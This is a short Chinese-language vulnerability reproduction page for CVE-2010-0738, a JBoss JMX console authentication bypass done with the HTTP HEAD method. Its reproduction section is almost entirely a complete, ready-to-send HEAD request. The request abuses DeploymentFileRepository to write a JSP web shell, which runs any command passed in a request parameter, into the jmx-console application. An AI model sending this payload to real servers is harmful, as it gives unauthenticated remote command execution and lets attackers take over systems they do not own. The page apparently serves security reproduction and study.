跳转至

CVE-2010-0738 JBoss JMX控制台安全验证绕过漏洞

一、漏洞简介

这个漏洞利用方法跟CVE-2007-1036一样,不过这个是绕过了get和post传输限制,利用head传输方式发送payload

二、漏洞影响

jboss4.2.0 and jboss 4.3.0

三、复现过程

因为跟上个漏洞利用差不多,只不过用了head传输方式,我这里就直接贴payload了

HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=hax0rwin&arg2=.jsp&arg3=<%Runtime.getRuntime().exec(request.getParameter("i"));%>&arg4=True HTTP/1.1

Host: hostx:portx

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Proxy-Connection: keep-alive